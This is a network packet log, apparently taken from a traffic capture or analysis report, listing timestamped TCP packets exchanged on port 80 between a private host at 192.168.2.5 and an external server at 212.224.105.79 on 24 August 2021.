Aug 24, 2021 08:49:17.265532017 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265552998 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265571117 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265582085 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.265588045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265604973 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265615940 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.265619993 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265638113 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.265640020 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265659094 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265666008 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.265675068 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265692949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265710115 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265718937 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.265727043 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265742064 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.265743971 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265760899 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265780926 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265788078 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.265799046 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265816927 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265820980 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.265834093 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265851974 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265860081 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.265868902 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265886068 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265891075 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.265902996 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265916109 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.265917063 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265933990 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265940905 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.265950918 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265969038 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265985012 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.265999079 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266016006 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266021967 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.266031027 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266032934 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.266047955 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266052008 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.266066074 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266077995 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.266087055 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266105890 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266115904 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.266123056 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266141891 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266155005 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.266160011 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266177893 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266195059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266208887 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.266211987 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266232967 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266242027 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.266252041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266263008 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.266269922 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266288042 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266300917 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.266304970 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266321898 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266333103 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.266340017 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266357899 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266379118 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.266379118 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266397953 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266402006 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.266415119 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266433001 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266448975 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266454935 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.266468048 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266478062 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.266485929 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266504049 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266511917 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.266525984 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266546011 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266552925 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.266561985 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266581059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266591072 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.266597986 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266616106 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266628981 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.266632080 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266649961 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266669989 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266678095 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.266696930 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.266896009 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266913891 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266932011 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266948938 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266958952 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.266969919 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.266978979 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.266989946 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267008066 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267024994 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.267024994 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267043114 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267050982 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.267059088 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267076969 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267086029 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.267093897 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267131090 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267131090 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.267153025 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267172098 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267179012 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.267189980 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267208099 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267220974 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.267225981 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267242908 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267252922 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.267260075 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267277002 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267290115 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.267297983 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267316103 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267323017 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.267332077 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267349005 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267359018 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.267365932 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267383099 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267395020 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.267400980 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267417908 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267436028 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.267437935 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267457008 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267468929 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.267474890 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267496109 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267508030 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.267515898 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267533064 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267539978 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.267549992 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267568111 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267585039 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267594099 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.267597914 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267616987 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267630100 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.267636061 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267653942 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267663956 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.267672062 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267682076 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.267684937 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267697096 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267709970 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267721891 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267735004 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267748117 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267760992 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267771959 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267784119 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267797947 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267810106 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267823935 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267836094 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267849922 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267862082 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267883062 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267901897 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267919064 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267934084 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.267935991 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267954111 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267971039 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.267981052 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.267985106 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268002033 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268002987 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.268019915 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268029928 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.268032074 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268053055 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268069983 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.268070936 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268083096 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268100023 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268107891 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.268115997 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268131971 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.268146038 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268160105 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268172979 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268186092 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268193007 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.268198967 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268215895 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.268217087 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268234015 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268250942 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268253088 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.268266916 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268275023 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.268282890 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268299103 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.268301010 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268316984 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268337011 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268337011 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.268356085 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268368006 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.268373013 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268389940 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268407106 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268416882 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.268464088 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.268505096 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268522024 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268537998 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268553019 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268564939 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.268570900 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268585920 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268593073 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.268605947 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268620014 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.268623114 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268637896 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268651962 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.268655062 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268671036 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268681049 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.268687010 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268702984 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268714905 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268718958 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.268728018 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268743038 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268763065 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268775940 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.268779993 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268794060 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.268795967 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268812895 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268826962 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.268829107 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268845081 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268853903 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.268862963 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268878937 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.268878937 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268898964 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268917084 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268917084 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.268929005 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.268933058 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268949032 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268965960 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268971920 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.268981934 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.268997908 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.269004107 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.269012928 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.269028902 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.269057035 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.269094944 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.292263031 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.292285919 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.292299986 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.292316914 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.292332888 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.292351007 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.292354107 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.292371035 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.292390108 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.292398930 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.292406082 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.292423010 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.292428970 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.292439938 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.292449951 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.292455912 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.292473078 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.292486906 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.292490005 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.292510033 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.292522907 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.292529106 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.292545080 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.292552948 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.292562962 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.292578936 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.292594910 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.292622089 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.292706966 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.292726040 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.292742014 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.292759895 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.292777061 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.292783976 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.292798042 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.292815924 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.292819023 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.292834044 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.292840004 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.292850018 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.292866945 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.292876005 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.292882919 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.292898893 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.292912960 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.292915106 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.292934895 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.292938948 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.292952061 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.292968988 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.292979002 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.292984962 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293000937 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293006897 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.293016911 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293032885 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293049097 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.293059111 CEST	49712	80	192.168.2.5	212.224.105.79
